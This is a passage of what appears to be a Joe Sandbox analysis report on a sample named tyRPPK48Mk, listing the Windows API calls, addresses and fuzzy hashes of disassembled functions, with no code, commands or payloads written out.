                                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                                                                                                                                                                                                                                                                                                                                                                                • ExitThread.KERNEL32 ref: 00413D4E
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                                                                                                                                                                                                                                                                                                                                                                                • __freefls@4.LIBCMT ref: 00413D74
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 259663610-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004302E6
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00430364
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004303C3
                                                                                                                                                                                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 004303EC
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3220332590-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1612042205-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyboardState.USER32(?), ref: 0044C570
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessagePost$KeyboardState$InputSend
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2221674350-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _wcscpy$_wcscat
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2037614760-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                                                                                                                                                                                                                                                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                                                                                                                                                                                                                                                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                                                                                                                                                                                                                                                                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                                                                                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                                                                                                                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Variant$Copy$AllocClearErrorLastString
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 960795272-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                                                                                                                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                                                                                                                                                                                                                                                                                                                                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                                                                                                                                                                                                                                                                                                                                                                • EndPaint.USER32(?,?), ref: 00447D13
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4189319755-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                                                                                                                                                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$LongWindow$InvalidateRect
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1976402638-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                                                                                                                                                                                                                                                                                                                                                                                                • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                                                                                                                                                                                                                                                                                                                                                                                                • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 642888154-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32 ref: 00441FEB
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0043137E: GetWindowRect.USER32(?,?), ref: 00431399
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 00442013
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 0044201A
                                                                                                                                                                                                                                                                                                                                                                                                                                • mouse_event.USER32(00008001,?,?,?,?), ref: 00442049
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 00442078
                                                                                                                                                                                                                                                                                                                                                                                                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 004420E4
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4137160315-0
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Variant$Copy$ClearErrorLast
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2487901850-572801152
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 004438CD
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 004438E6
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcstok.LIBCMT ref: 004438F8
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0044390C
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcstok.LIBCMT ref: 00443931
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3632110297-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(0000000A,?), ref: 00436EC9
                                                                                                                                                                                                                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00436ED0
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateEnvironmentBlock.USERENV(?,?,00000001), ref: 00436EE0
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00436EED
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 00436F23
                                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyEnvironmentBlock.USERENV(?), ref: 00436F36
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1413079979-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                                                                                                                                                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                                                                                                                                                                                                                                                                                                                                                                                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                                                                                                                                                                                                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2833360925-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                                                                                                                                                                                                                                                                                                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                                                                                                                                                                                                                                                                                                                                                                                                • LineTo.GDI32(?,?,?), ref: 004472AC
                                                                                                                                                                                                                                                                                                                                                                                                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                                                                                                                                                                                                                                                                                                                                                                                                • LineTo.GDI32(?,?,?), ref: 004472C6
                                                                                                                                                                                                                                                                                                                                                                                                                                • EndPath.GDI32(?), ref: 004472D6
                                                                                                                                                                                                                                                                                                                                                                                                                                • StrokePath.GDI32(?), ref: 004472E4
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 372113273-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 0044CC6D
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                                                                                                                                                                                                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                                                                                                                                                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                                                                                                                                                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CapsDevice$Release
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1035833867-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • __getptd.LIBCMT ref: 0041708E
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                                                                                                                                                                                                                                                                                                                                                                • __amsg_exit.LIBCMT ref: 004170AE
                                                                                                                                                                                                                                                                                                                                                                                                                                • __lock.LIBCMT ref: 004170BE
                                                                                                                                                                                                                                                                                                                                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                                                                                                                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 004170EE
                                                                                                                                                                                                                                                                                                                                                                                                                                • InterlockedIncrement.KERNEL32(009C2CE0), ref: 00417106
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3470314060-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                                                                                                                                                                                                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                                                                                                                                                                                                                                                                                                                                                                                                • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                                                                                                                                                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
